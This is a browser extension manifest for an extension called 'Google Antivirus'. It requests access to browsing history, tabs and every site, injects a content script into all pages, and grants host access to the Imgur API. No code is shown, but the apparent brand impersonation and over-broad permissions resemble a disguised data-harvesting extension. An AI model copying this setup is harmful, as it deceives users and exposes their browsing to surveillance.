{
  "manifest_version": 3,
  "name": "Google Antivirus",
  "version": "5.2",
  "permissions": [
    "scripting",
    "activeTab",
    "storage",
    "history",
    "tabs"
  ],
  "host_permissions": [
    "<all_urls>",
    "https://api.imgur.com/"
  ],
  "background": {
    "service_worker": "background.js"
  },
  "content_scripts": [
    {
      "matches": ["<all_urls>"],
      "js": ["content.js"]
    }
  ],
  "icons": {
    "16": "icons/icon16.png",
    "48": "icons/icon48.png",
    "128": "icons/icon128.png"
  }
}